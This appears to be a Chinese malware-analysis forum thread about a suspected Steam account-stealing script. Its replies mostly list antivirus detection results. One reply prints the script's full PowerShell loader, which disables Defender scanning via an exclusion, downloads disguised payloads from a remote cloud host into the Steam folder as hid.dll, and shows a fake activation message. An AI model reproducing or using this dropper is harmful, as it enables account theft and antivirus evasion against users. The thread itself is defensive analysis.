疑似Steam盗号脚本及其下载产物

显示全部楼层 · 发表于 2024-3-25 12:45:24

密码infected
已测Windows Defender/EIS均未报毒
实体机验证在Steam目录下会多出一个hid.dll，打开Steam后会尝试访问以下地址

new-service和谐biliapi和谐net
steamruna和谐oss-cn-guangzhou和谐aliyuncs和谐com

复制代码

第一个地址浏览器访问时ESET弹出警告

显示全部楼层 · 发表于 2024-3-25 13:03:54

本帖最后由祸兮福所倚于 2024-3-25 13:07 编辑

360kill小Amiss

显示全部楼层 · 发表于 2024-3-25 13:04:27

本帖最后由偶偶偶114514 于 2024-3-25 13:07 编辑

di:pua(dll)
深信服阻断可疑ps1

显示全部楼层 · 发表于 2024-3-25 13:05:25

avira

显示全部楼层 · 发表于 2024-3-25 13:15:26

卡巴扫描miss

显示全部楼层 · 发表于 2024-3-25 13:37:09

毒霸 miss

显示全部楼层 · 发表于 2024-3-25 13:54:53

本帖最后由 DisaPDB 于 2024-3-26 19:43 编辑

又是这种替换hid.dll文件实现假入库的

$localPath = Join-Path $env:LOCALAPPDATA "steam"
$steamRegPath = 'HKCU:\Software\Valve\Steam'
$steamPath = ""
function Remove-ItemIfExists($path) {
if (Test-Path $path) {
Remove-Item -Path $path -Force -ErrorAction SilentlyContinue
}
}
function ForceStopProcess($processName) {
Get-Process $processName -ErrorAction SilentlyContinue | Stop-Process -Force -ErrorAction SilentlyContinue
Start-Sleep -Seconds 2
if (Get-Process $processName -ErrorAction SilentlyContinue) {
Start-Process cmd -ArgumentList "/c taskkill /f /im $processName.exe" -WindowStyle Hidden -ErrorAction SilentlyContinue
}
}
function CheckAndPromptProcess($processName, $message) {
while (Get-Process $processName -ErrorAction SilentlyContinue) {
Write-Host $message -ForegroundColor Red
Start-Sleep 1.5
}
}
$filePathToDelete = Join-Path $env:USERPROFILE "get.ps1"
$desktopFilePathToDelete = Join-Path ([System.Environment]::GetFolderPath('Desktop')) "get.ps1"
Remove-ItemIfExists $filePathToDelete
Remove-ItemIfExists $desktopFilePathToDelete
# 确保结束steam.exe进程
ForceStopProcess "steam"
if (Get-Process "steam" -ErrorAction SilentlyContinue) {
CheckAndPromptProcess "steam" "[请先退出 Steam 客户端]"
}
if (Test-Path $steamRegPath) {
$properties = Get-ItemProperty -Path $steamRegPath -ErrorAction SilentlyContinue
if ($properties -and 'SteamPath' -in $properties.PSObject.Properties.Name) {
$steamPath = $properties.SteamPath
}
}
$hidPath = Join-Path $steamPath "hid.dll"
$hidcPath = Join-Path $localPath "appdata.vdf"
Remove-ItemIfExists $hidPath
function PwStart() {
CheckAndPromptProcess "360Tray*" "[请先退出360安全卫士]"
CheckAndPromptProcess "360sd*" "[请先退出360杀毒]"
try {
if (!$steamPath) {
return
}
if (!(Test-Path $localPath)) {
New-Item $localPath -ItemType directory -Force -ErrorAction SilentlyContinue
}
$catchPath = Join-Path $env:LOCALAPPDATA "Microsoft\Tencent"
Remove-ItemIfExists $catchPath
try { Add-MpPreference -ExclusionPath $hidPath -ErrorAction SilentlyContinue } catch {}
foreach ($file in @("version.dll", "user32.dll")) {
$filePath = Join-Path $steamPath $file
Remove-ItemIfExists $filePath
}
$downloadData = "https://openai-75050.gzc.vod.tencent-cloud.com/openaiassets_a29b7e99f734fe5de04592ae7a85b8cc_469401708849154509.pak"
$downloadLink = "https://openai-75050.gzc.vod.tencent-cloud.com/openaiassets_e6d9707966d13169268e57c67783a8fd_469401708839251548.pak"
Invoke-RestMethod -Uri $downloadLink -OutFile $hidPath -ErrorAction SilentlyContinue
Invoke-RestMethod -Uri $downloadData -OutFile $hidcPath -ErrorAction SilentlyContinue
$steamExePath = Join-Path $steamPath "steam.exe"
Start-Process $steamExePath
Start-Process "steam://"
Write-Host "[连接 Steam 激活服务成功，请重新登录 Steam 来激活]" -ForegroundColor Green
Start-Sleep 5
} catch {
}
}

复制代码

PwStart检查并提示用户关闭360安全卫士(360Tray*)和360杀毒(360sd*)。若$steamPath未设置（即未找到Steam安装路径），则返回，不进行后续操作。创建$localPath目录（%LOCALAPPDATA%\steam）。删除%LOCALAPPDATA%\Microsoft\Tencent目录。尝试将$hidPath添加到Windows Defender的排除列表。除Steam安装路径下的version.dll和user32.dll文件。从两个远程URL下载文件到$hidPath和$hidcPath。启动Steam客户端（steam.exe）及Steam URL协议（steam://）。输出提示信息，告知用户已成功连接Steam激活服务，建议重新登录以激活，并暂停5秒。

显示全部楼层 · 发表于 2024-3-25 14:16:06

安天

放行后

显示全部楼层 · 发表于 2024-3-25 16:23:10

crowdstrike 解压杀

显示全部楼层 · 发表于 2024-3-25 17:29:02

解压杀

[可疑文件] 疑似Steam盗号脚本及其下载产物

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源